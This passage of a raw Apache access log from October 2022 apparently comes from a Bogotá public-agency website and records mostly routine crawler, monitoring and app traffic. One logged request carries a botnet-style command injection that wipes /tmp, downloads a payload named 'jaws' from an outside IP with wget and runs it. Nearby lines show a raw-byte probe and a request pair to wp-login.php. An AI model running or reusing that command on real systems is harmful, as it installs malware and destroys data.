186.102.54.228 - - [12/Oct/2022:02:36:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19TivqdrIpAH6WISbwULKNEHMWYbAxTZBnHVIDWUqYZcqTXD1j0YQXD8NdhTZuaEIvDUuSceVEI2pEhGN1T1pUHTwBCrNKkc0ohRaNOnsLLI0vIHeRluMTLSZxDvkNUBxxAq/II25XxYwpamktbVruUb9sb45iPfsDFfeLJofzc6VgX9Ny66oBN&u=U2FsdGVkX18TPjpcPpORqP3abaBXgf2pXGzgAJINzCg=&y=U2FsdGVkX1/I/iGP9C60V1MarIpQbTKvCrcUX8DV7z0= HTTP/1.1" 200 25
216.245.221.92 - - [12/Oct/2022:02:37:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Oct/2022:02:37:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Oct/2022:02:36:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.40 - - [12/Oct/2022:02:38:18 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13093
207.46.13.89 - - [12/Oct/2022:02:38:32 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
172.22.2.4 - - [12/Oct/2022:02:37:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
45.143.200.118 - - [12/Oct/2022:02:39:37 -0500] "\x03" 400 226
201.245.192.253 - - [12/Oct/2022:02:42:11 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44153
201.245.192.253 - - [12/Oct/2022:02:42:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43753
216.245.221.92 - - [12/Oct/2022:02:42:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Oct/2022:02:42:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Oct/2022:02:42:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:02:42:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55630
152.39.253.218 - - [12/Oct/2022:02:44:44 -0500] "GET /distrito-alcanza-ya-15-acuerdos-de-conservacion-por-174-02-hectareas-para-consolidar-varios-ecosistemas-estrategicos-de-bogota.html HTTP/1.1" 200 1061
172.22.2.4 - - [12/Oct/2022:02:45:12 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [12/Oct/2022:02:45:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [12/Oct/2022:02:45:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [12/Oct/2022:02:45:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [12/Oct/2022:02:45:13 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [12/Oct/2022:02:45:13 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [12/Oct/2022:02:45:14 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [12/Oct/2022:02:45:14 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [12/Oct/2022:02:45:14 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [12/Oct/2022:02:45:14 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [12/Oct/2022:02:45:14 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
216.245.221.92 - - [12/Oct/2022:02:47:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Oct/2022:02:47:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
103.234.94.23 - - [12/Oct/2022:02:48:03 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+81.161.229.46/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
69.63.184.120 - - [12/Oct/2022:02:49:32 -0500] "GET /en-navidad-bogota-protege-el-musgo-y-sus-ecosistemas.html HTTP/1.1" 206 802
172.22.2.4 - - [12/Oct/2022:02:47:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.89 - - [12/Oct/2022:02:49:55 -0500] "GET /BLA/resoluciones/AUTOS%202022/1844.pdf HTTP/1.1" 200 405163
172.22.2.4 - - [12/Oct/2022:02:48:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57375
216.245.221.92 - - [12/Oct/2022:02:52:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Oct/2022:02:52:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
95.217.144.234 - - [12/Oct/2022:02:54:46 -0500] "-" 408 -
186.102.54.228 - - [12/Oct/2022:02:55:03 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX18TnjgSvOwmKMNPXmSj4cotxQOqOX/RJidVj+JIVmXIVYMSOnzy1fDpjX6M85JcxxQnONHoAKJ4yzBKS5sNDnEaISWXMaqmXkOc9SH8Wv9kbJRt1WYXcJKkA3GJfkctIkU/GsU7FgJNuA==&u=U2FsdGVkX18TPjpcPpORqP3abaBXgf2pXGzgAJINzCg=&y=U2FsdGVkX1/I/iGP9C60V1MarIpQbTKvCrcUX8DV7z0= HTTP/1.1" 200 60
186.102.54.228 - - [12/Oct/2022:02:55:08 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+n0YjSTTv6bTVIPYTlvJibioA1GcVdSDO0r60mvvIST3tNerSc2tvw&y=U2FsdGVkX1+dp4Voa5MmyGH1M19PD3FEhpSx6Hfid0s= HTTP/1.1" 200 30
186.102.54.228 - - [12/Oct/2022:02:55:08 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/MIPCiE6E812aGoFJrYFydw329pYKSZk/PQYO7rUVoLN7IQkVvlRUhA+ttKk9l9jxefMJlxm/0AYbGkh29JXZux9wpFGEhXxA=&u=U2FsdGVkX1/UF57NslKKMQ1/xVNDfFS3KFR5B30FbpU=&y=U2FsdGVkX1+dp4Voa5MmyGH1M19PD3FEhpSx6Hfid0s= HTTP/1.1" 200 97
186.102.54.228 - - [12/Oct/2022:02:55:08 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19/qQBGSfEe0Q56feSh1GzSGLUSghphWo81FuPDs8/y/s4TKqDeMWe0WttsRMPkTg7GHVj5TeSC+PJkH+2vrthtMnNYLFaSHPzl5tpdQ1e2QuFo9yvT2snM6RCVffY6bluemN+ia9MSwVIJr18IqFECY9eDVGf46122LmPbz7bGpHw8QHHcYFPwNZL/8cWGyZPoIxQtIG9U8iuHltB/1pZYqUrWnOdyosnEK26QgkwTP9OGTHttc+nB0aBi3snnOEWGjWlPFtoubje1dJTFqRaW7LAkj6pbSiUWI5qTZBFs7X1BRTuI/AYKNBppcceBK5SUIsK9FEBEk4fPNmfLqwHJBGaKwEJj8Koana/1nASWY1p3kbUamQECqpfMZeCDQzurlNNlUlJai9Y9lkI+mNv1J2FYukQIewvmjx3khN+lJV4U/luiMq+V1wS7DG00IxZIc6q8I2NzsQ1wKUZs8o0IlyS5L+CE6L20jaZTjIqLU3FsKGcI6MytjkGYPy5cgy81a5XsJI30m3OZjkk6lvAmJyJsjGHazN/Ny+X4NEcSLXKMh2nJespbFh3QUTMnGIa9GuDx4iewdEhWDcfV1P6OumAqJp7SOvpoXdZrhdIki3mDW9l7cL+X2+F6BLGiM9ENoQ43EMCyHOH8YP9GaNLCyIoQJC6tJ/6LvVUA3lwrr+2FbVj5Qiz9tD4rhcHz9bq9lJ+KT1dP8yD1XpibjGTrbkjHwzbaXFJEQIuvCqbWh5O0g6HIAhrzkcsf/eHviiG/oEUNdHfC6FPSeCsuwbwxhBMQOSEG6HrR4JHABmgBl3fueiy+/kdh9ukTrajwbzuarjFG8Jlfiu/0yA5fxF2gwwFKjO0ceR6ulfkpqBmPfCqzHbLD2aSNTT4CMaddX3ZzIP/qpKT1uPCH8n95U5lEsdL4+vL2FMh8lGsrF7DEYtQT4OIPhCdeUzI8TtSHWDerZggRHVrAWZn6nIAQlaaQXKGQcKKOnd68qweWSL+NWaD2muUkRtaZxlAV48exIAuxI+Q/N7qZ10dmll8b5ZktSR4657VzUFe6Q2W8n85h7qpmXZiJdkoVTQschw83fkLJvWnzoXVmGX6ChE287OSdngXlWWDVpdXYNv5URzmCXmrt7JZF683HYxJP57a253lJAqRorQNHv8yAbJ685xU5pllUFOAJObG9ZLn2pCvHhTIL5N0hM7T9HuDQJbWcK0uIo++zr1LLw6cST9I/ZDaXY5Y5pTp91rw05lXk60r3YJM2HaLAU25UEVckD0GOGAvZwCTHaT3nSMKYJoJxQIC03L+l4gRQ2YIL6jNanbJ2/nGyNI1PIdvT8j1jFDsnIBey8LcnwYCeQaeK9NOlQVlH6Nne8oLrjsFwXrm3KuWocia8XONtJBVacGhayb1ZGtp8wTpsf9J+rL4hlehIVQg1mRvKR4j8jwU=&u=U2FsdGVkX1/UF57NslKKMQ1/xVNDfFS3KFR5B30FbpU=&y=U2FsdGVkX1+dp4Voa5MmyGH1M19PD3FEhpSx6Hfid0s= HTTP/1.1" 200 717
186.102.54.228 - - [12/Oct/2022:02:55:08 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+Dx1k90YKGaj+yUVW5bxaVzVyjAyksFXQDI1ZJ3xS46eYvRMD4nq7FvqkIHYw8h81K/L6PQ4Qd+7J9+oi/5/cZz4qFEZ1kCwtGPI25vAAeAaPPATQpYX7ytj0ERTBR1HESMOlhjwZzUfNmqYoa+ncdb32cdJzrUFbqH46HOMdVtgKJGQJ9ebVhU8mh6jGY8YE/ROOYSrOjX9pOrfAmW09hMu1Lpup54h8tBK0JupvA5dzoaH9oTy3KaX50Wo6Iq4bHoWEwWjbHhNh5b7hx5Mg+UXGrl5OrveVqJYeixKQ0IOuTmiiqc2EP1R3Wq+bBLT5EJp+VDxHMUQ==&u=U2FsdGVkX1/UF57NslKKMQ1/xVNDfFS3KFR5B30FbpU=&y=U2FsdGVkX1+dp4Voa5MmyGH1M19PD3FEhpSx6Hfid0s= HTTP/1.1" 200 196
186.102.54.228 - - [12/Oct/2022:02:55:08 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+n0YjSTTv6bTVIPYTlvJibioA1GcVdSDO0r60mvvIST3tNerSc2tvw HTTP/1.1" 200 30992
186.102.54.228 - - [12/Oct/2022:02:55:20 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+Uyv0dGaaaLxcqvthOmFc+ZSxNE2abLC8jCEDQEmlAekw3Vadt1sqX&y=U2FsdGVkX1+5N3UXR7cSPB1x/nzEJBuQBL+Cl88uL5E= HTTP/1.1" 200 30
186.102.54.228 - - [12/Oct/2022:02:55:21 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/e8EdDSHrEjuniupH1NC6oQQIJ+JdcL9DGv7rwutpOoIUxJPbHXjKRV9phTiAHmnb1R/R91Hc5fzKtubBI7bHXr25Pv3l/iA0=&u=U2FsdGVkX1+igZMim7nPOBLLDHflAxiioT6vkmw9JnQ=&y=U2FsdGVkX1+5N3UXR7cSPB1x/nzEJBuQBL+Cl88uL5E= HTTP/1.1" 200 97
186.102.54.228 - - [12/Oct/2022:02:55:21 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19qixjBTBbIgGmQVgux/QkxcHYcUWvFpGMJPoKCUNdbrX+K0KgwuaEoN7rRdYJ8w5+RUYeS6AUskYfHroSJzxzjpZ5I7NP/b814BOi7GL1InO6QvMCTraE2LoPBakSJNufEWnQtiG9VMsk+SyGBOYyzse/4jHBit5TW4XFw1wRie8YOYuLCmuetYdkIc0mcINO1D7CXfW/ivo+/LxiCcPv/6QDmiXG9yX2L6z+pKfoEKLV88Hj5Y6M86O7OdOfgxCdoQ5IBQ/WJMuVAAQI7TL2CCyBfRXYw1SXQ6yvERIdZNmMIiO5Zfwb8IafNXrs0GZNd53hrzHdaH7304oltPk5HNYns7lTLE4NY3epItmL0p/G9PxPmq2dUu6MbqF4QAQJiwYu2IQ3R7cbu6IqmLQDT8UfWAwXHYMdcrtuVhfda3MnQvkZPg7fVAO1vHIYSrQvpv2yQlKu5zOo0ebN76wTI/T5Sgagb5jVwM35pc+fzVsGtXg3wOdrcOYi+wxzazD7CQaYmkmx6/5SNnVtIiheeAXA6JfuIVeCk6+CyWdAN+mQufqmDJzRy8RoBtHEejO86b14O/AsRiPKSUUkQL4BtKjDnijlZakm2d1A/B+q5j9TK3gRo0BjVc5s2jpsLtrbo/vcQq0vcQG44y7+GK/rcOMNpRlCRH4CHQL8P6URZSUicscu1KeMdaRNOMn7+dKaDk5vu8nJNmVoZc9yGJvJ3zEfr40l6icbNgEmhjj+tptDpby4yjpf69pMEL3+tX1sQRtGKn0EbRV+R1XUsvMMpUmX7ZmqVs3yRv2QdRfLi6ANuEzTAhoceW3hcY8p4Rhe9JUaFqG39awGMZw5GR6La7t8i7W5aSS34q57UR9FEYoWEwaKOE/OfLF2AUxU+PdbwfKqfpaY59IVY6GqzRZDWmOgWHdMTeGWfsDEj/RsOebsqe6Y+pVDnHjAswPYYE/sDMetuHQYEOGJmF4nJccwlNPp0CUGHi2um/03Ngv4i1DOPBQCFZtQCUa1hb8UPuQeH6K5fdbgBvrreyYGMQDzx1SePys0bkjsoJSalLQCIeSMb/9EXYTeCYjwg238hBFVN4oowOOYzTBl5JssJ+aKGYaWHbkBCl4QF1tWqz6TO7vPQy7tGu+/MNQdyQGE3iHnS6Vzl1+jEfk0lW9AvU/kUwxQ88uyc/8Tuw6FlXT8OzL43DF2CTlAK/cjWcx/8+5+yocPZeVuily+6ky5j2Mg1mgdMP61sdXShbnS9ZHDsngLUosCYu5CX4F9n+v+X7oVB0UrJU7CMQ1oIRbXhY9OcjdYKOX1toiU+1k+bLnLMoNAkC+/RwC7VC+QUSgagPJHH6MKtfIgHIECB2XzzvKLarBKoFewtShIWl5tFRrcaVab51BsX5WSdSSOiECmZZzni+JBTAAkHbLkHBiLB5oCif74mrA0y+yw=&u=U2FsdGVkX1+igZMim7nPOBLLDHflAxiioT6vkmw9JnQ=&y=U2FsdGVkX1+5N3UXR7cSPB1x/nzEJBuQBL+Cl88uL5E= HTTP/1.1" 200 717
186.102.54.228 - - [12/Oct/2022:02:55:21 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+mAQxoJhk2imYjjVgkazYay7a8IlpFncj8serSQsutnxsIROMh1kXMVR5dOxScMTz0JOG3yYKh3It+XdwEBHJ1z0pUZ5/XPIXsZwvCULMdjqLBMK3XmN5kWJLLvoLR0fkJGid5Mj1/0AxvHTSAuX7HvYXK6h9ZMVDZxT84Wt0MfAaFEz0kC7/4zD8EeJ5QiXP2uWX2MgdntNx/0pxvTBA7mG9NepaYpeR/K+yjtLtltV3647e5PoQ2qt7qatxeFsFcAGi/bkLa9LN+3DyeArPnS57tSprJqAGq/h64W0J+rxS38+21w94o1GVWXCOdiQVZewHpMyVuvQ==&u=U2FsdGVkX1+igZMim7nPOBLLDHflAxiioT6vkmw9JnQ=&y=U2FsdGVkX1+5N3UXR7cSPB1x/nzEJBuQBL+Cl88uL5E= HTTP/1.1" 200 196
186.102.54.228 - - [12/Oct/2022:02:55:21 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+Uyv0dGaaaLxcqvthOmFc+ZSxNE2abLC8jCEDQEmlAekw3Vadt1sqX HTTP/1.1" 200 30992
172.22.2.4 - - [12/Oct/2022:02:53:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:02:54:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57725
216.245.221.92 - - [12/Oct/2022:02:57:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Oct/2022:02:57:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.102.54.228 - - [12/Oct/2022:03:00:08 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18+vuKiKXtfvg6nOXaJs1MQJPDKtExAqavHiJusTw698UfPQmcOOlNM/QiGBFVE0JTkCBF1XKDLjgZOdj4aWgv7c8l01HkoGwt1MP6e3bNslUgtaOgan91+rEx8xgNqOGEH83Ig7uusMIFK0Tm3Q17CcH+u/TsPDDveLGjL2B0gGPhLBsdiTjbv4EBcKqn4g9haksrCMw0Q2Rw8W9AHq40XBn5Oda3Tm7GG3b3YH+Z7/eztSSyg4j9aICwIzH2+3S/76BHqGVoxHA==&u=U2FsdGVkX1+igZMim7nPOBLLDHflAxiioT6vkmw9JnQ=&y=U2FsdGVkX1+5N3UXR7cSPB1x/nzEJBuQBL+Cl88uL5E= HTTP/1.1" 200 26
186.102.54.228 - - [12/Oct/2022:03:00:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+BGfsH+fkCdDWMieFiDSzMusJX6dTF4urkTrurLLoBNW7jLREiEXeMOcbB5ZoaHyk80JgxfiBXpLRzsx9Jt56eCAKOuHEPGr9lFwafH6O4UtFPhDKXuzW/SCSRO8+s5EPQ33cKey7NsV8hanAs6BINNe+SRWXzHwP9tDifxxaWUfQ+ZyunSb62XPPDF8CTqJp8aYrm4QI5ye2BWwsTkaXaRngOMi6S4SDoqVZXZ5ZcGZDdHCXho6YbyAY/eliLKO2S43qUVThknYy9MiYtfALolCkdIFXHlXLkiwKYFswu3wxS4wzdH2isbwBx5t7hurjl2l0HxnQY7xrzhvMpf9ZGdEpxHRA+zhl4WtYd7yevDB4EOnfr7oCVDKmvgB7AsoKh6D0j7CKaUPtVYIqN4OV9tSBEc3JWaVeQ1hQ5r0cxZxUK/DZpVl/LzUykKK2rzvDGDNPl2Kw92fzwcMRaDg+F2WFjyE+q9+GgPQ21ZU43RzTw0xBQh0ZF9rSrZfDDw9oeNPs+0VsO9y5k8fZ/cO/CE1ZAgeZgybCqWnMwgTHLU+FJjHdKbxVxd9wv91qDqRJXusctvpUAgpCOgXNm/JH4EUTGzl795+UOvCbwf4G2lOJ+LPSCfWU+iYCAtFqNqCE3K4B6s+fy8t1n5zUTQC3dS8j1dHuTzpfAzT2GK1dADX5sOdyHpm9lqHsQS8yIoWMFho8asgvO0eSryXxIUHUMMg3WTIN6CE0wl3OQEhRYxtrwwVAEC0LeYFr7Rqgd5pw0d7IdDDP/HCSrhKVFVQ8a0FonOPprs80uEu0gzycAMzjsBB6cuA1C7E6HHoxsMKewB8Sw3ZnUnAhPoPl2t2tBD0y0bqRMrd4JTxGZWweynu655qvtRwSc6NeqMAxp3IKLGrk5QmsPZepFRALG6cdV7KNAzw7lropgoRQkRNDQFkzccWgCMk3Ft24BIj5B0K0WG2Kri+EWJ9w6T5NJyx0J+VHMO4aj+8KUpMFO01wQ93p0HX0n67tAsbZyPLZeAsm0URYElkaneM5yWYL7Wuw/0eqiam1zd+FnhbDK2rEvAV/+KjOlojdt64jTjYZCHkX8Coz26ckT18ToMR53y8qG8yQlqG+NvO6sGIG9spCezjawa0adYJ6jgTExz/eA5pteLIYjd0qu37Z8zdUJ5QjP4JaWA1kPBT+D/VzT8yjaDB9deODUwhiz97e+o25jhiCA5KIkMaRXUnmnlfsA81I8pDNsJQH4KfmTW0iUP4vVxhl2w4SMKguZRJYX/X8HSNQDEJnqFeHhS9b+QT5CkSdyBd3U00LI1PLHVhSEUmTztQtcPBN4FLwzbaVCIES6KybkdGB1RwlgMIJ/OwCPamAFycGfhehPl8dXCLERwW8zsw1ix1AfLIUG16PS8sEdBvjjZogoql3/yg5UxRpbXwhn/Q5aUvP7gJEX7Txb2mo9dbbUjTeLcXap+aUJN5nsyX39xupFgC0whg==&u=U2FsdGVkX1+igZMim7nPOBLLDHflAxiioT6vkmw9JnQ=&y=U2FsdGVkX1+5N3UXR7cSPB1x/nzEJBuQBL+Cl88uL5E= HTTP/1.1" 200 25
186.102.54.228 - - [12/Oct/2022:03:00:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/zKmtc0eYYW5/mrQA3MchLGyKKogMnVff/1hSfcPEa2WauWXWOVgKEllD+rHnX6QgE92GhbEuJRuDRI7XdSsNkD/4JYXih/6n8U1uQiljbrsyi8Yk/vFCmHpeWAaBGbD+94ziomeNrfBjC6SREqPlmgP/g1+0yoZA=&u=U2FsdGVkX1+igZMim7nPOBLLDHflAxiioT6vkmw9JnQ=&y=U2FsdGVkX1+5N3UXR7cSPB1x/nzEJBuQBL+Cl88uL5E= HTTP/1.1" 200 25
186.102.54.228 - - [12/Oct/2022:03:00:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19msuhH4BOrTIEdOyHuuSm8nSgJLYJSCF0L4cPw3sYeDKYG24slzh64WZAgWLjVSbsq1GTtmVXhHjoqmuv4eKs3LK5xLXnA5QqirLpxIO0BQoIKh+3LzLpqGmsqFtI2Zp7OjvxJKqynIGDkB0rQOJ7w+jORGTyescM=&u=U2FsdGVkX1+igZMim7nPOBLLDHflAxiioT6vkmw9JnQ=&y=U2FsdGVkX1+5N3UXR7cSPB1x/nzEJBuQBL+Cl88uL5E= HTTP/1.1" 200 25
186.102.54.228 - - [12/Oct/2022:03:00:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18Qn2H8RHRVM0CYxfanf/xBr+Ky7GslNfAyPghU+CYUH4faeuoZezyPObnDkevejvMXGrT7jiZC5PsoEp5/yNkPbCYGCoLBg114xGTdrmP9wOB7dyd1N9lbjq8sncwKCFcV9FLnT90UUAI9QvuCM274MCDFDej65Sc=&u=U2FsdGVkX1+igZMim7nPOBLLDHflAxiioT6vkmw9JnQ=&y=U2FsdGVkX1+5N3UXR7cSPB1x/nzEJBuQBL+Cl88uL5E= HTTP/1.1" 200 25
186.102.54.228 - - [12/Oct/2022:03:00:09 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/97VdYXFoGJt9c86aS844eVV91eaji7IiJKyvCFL/ZmadgncxKhlnGeWG7q978KP1E9ySe/wpp1WsGvhjpV+KBV0dlzGL3AxcbY4I3X7JJkbHKtjs1ngyS409KVQmbeOl95AmvwutR4rdIXvYOeHS/7hiNaVNdOoveWqdIbXy476TUBhzyiIo6&u=U2FsdGVkX1+igZMim7nPOBLLDHflAxiioT6vkmw9JnQ=&y=U2FsdGVkX1+5N3UXR7cSPB1x/nzEJBuQBL+Cl88uL5E= HTTP/1.1" 200 25
207.46.13.89 - - [12/Oct/2022:03:00:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20851-900/892.tif HTTP/1.1" 200 271800
172.22.2.4 - - [12/Oct/2022:02:59:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.202 - - [12/Oct/2022:03:02:04 -0500] "GET /galeria/galeria/fotos/Soratama4P.jpg HTTP/1.1" 200 10482
172.22.2.4 - - [12/Oct/2022:03:00:26 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
157.55.39.159 - - [12/Oct/2022:03:02:09 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/pieza-dia-mundial-general-tinguas-8-mayo-1024x576.jpg HTTP/1.1" 200 84713
216.245.221.92 - - [12/Oct/2022:03:02:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Oct/2022:03:02:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Oct/2022:03:04:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [12/Oct/2022:03:05:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [12/Oct/2022:03:07:31 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [12/Oct/2022:03:07:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [12/Oct/2022:03:06:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58575
157.55.39.154 - - [12/Oct/2022:03:11:22 -0500] "GET /portaldeninos/wp-content/uploads/2021/11/dibujos-concurso-vuelo-pajaro-relatos-27-mayo-768x760.jpg HTTP/1.1" 200 79739
66.249.73.100 - - [12/Oct/2022:03:11:28 -0500] "-" 408 -
201.245.192.253 - - [12/Oct/2022:03:12:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:03:12:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:11:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:12:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52493
185.119.81.103 - - [12/Oct/2022:03:15:42 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.103 - - [12/Oct/2022:03:15:43 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
201.245.192.253 - - [12/Oct/2022:03:17:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:03:17:31 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:17:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [12/Oct/2022:03:17:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
201.245.192.253 - - [12/Oct/2022:03:22:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44163
201.245.192.253 - - [12/Oct/2022:03:22:13 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [12/Oct/2022:03:22:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41543
201.245.192.253 - - [12/Oct/2022:03:22:28 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [12/Oct/2022:03:22:31 -0500] "HEAD / HTTP/1.1" 200 -
186.29.159.42 - - [12/Oct/2022:03:24:12 -0500] "OPTIONS /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 13
186.29.159.42 - - [12/Oct/2022:03:24:12 -0500] "POST /kwssiamovil/sm/setfile/f? HTTP/1.1" 200 381
186.29.159.42 - - [12/Oct/2022:03:24:32 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/bvkST9Do8XyOdQFh1qlou/rA/Jy+4sHKRQ4CS3BQz1JNaONWwS6krvE3W+J9vLZp2VVQU34v8U8vPn7Rl8gf2WD7L1UA0WQqW/5TkeOPhooBCHQ1wBk6WI431dgW15rLaLX2kGoGYp6X2anLbrzGQPLkSWsHFRecjb+FOE+neYAi+IUQmDMsVeLnNbKeFt6AW4U04mL6o4Ikm9vcPDnGzCFpHj7E5SJdrA3TGZABq+wrrGAB5ZwRDAQz5qiQRYe2wOmeJYeH6vA==&u=U2FsdGVkX1/85PalwGOr5JyRDLwal06woesSAS0EZzFfDU5/ftG+nIHb4saLUquZ&y=U2FsdGVkX18lx6hvZv0Pq5JUyeE/raJYK/9uqU5/RG0rSP17xLhA3GdLhjc39kpA HTTP/1.1" 200 26
186.29.159.42 - - [12/Oct/2022:03:24:32 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18qcn4R/5W3K56T1J+qC7Ib5SsY13RPEpsu7Dohbcm5/l3Nn3c1tYM87WOoW8tYUQqyEf+OH8o+6DpNiwc1K2Q2u/4JSnhIooV3BYNZN5EDwNPA5l8yiMcGn454epeqQ/L+KrbABqbByuuWiukRAhSXK+NihJUdeUSityEP/od6aqLRW2An76fRp9qxDDCMmwLZSe9DE0bvItyRGs0leNuaxTX7C+9B/Snd9aXYYbEH6GDn6XUWsmEX+poECLUNkO76dJzfmZdBJ70Bk8UI9FuYD+le4MCWxhiBpVrwQovqxbHtFBhgCwkdR1d8KFHQc2yuG2qUp8dQmCkEDCQ+fuTz/ODUW4fYjlLUyNdp0J5Mfmng18JZDbz+iXUdZiqkxbb/xkbUtm/rmKBlr9njhn/J+DQQYx9kM03groGn06ZS3zcL5xIbw8dbgGZVrWm5N6AKNzRQFEXISlYRqJ7IAHGAFwsqvdIOqwKS6GsfbkScI+da3olbh2q5QOHNNQAFZPxa46/2lkaiRKKkzGVjUPfx1KeP02fkTq0hyUfGRfCufL0THn2TsBE3l7QtZZcD/3NVk2Vk9SB3Qes7Lot2a8IQ/+j1QH4VQQtjV/urBLqonEUeRHxGksqZQtEOQb0NmRwyBzHJynPAOdlTByXsZitmQRw8NI44EuGZLiekY7s+xMxwNvDZNVMixPYhga+aWsEY9vGDHV0pMhAAu5sF3cq2cB/p1JgBym1SHC0Q2Dc80F/JUxjArxbeY/x0ZKj0t8AvH30Wk0BltPdpXskmcOQ3eg0UFOqi0MpzGA9GawUS4JfGt3JHQPju48K3r5dQolpaUhr1SWvooYf1Fw2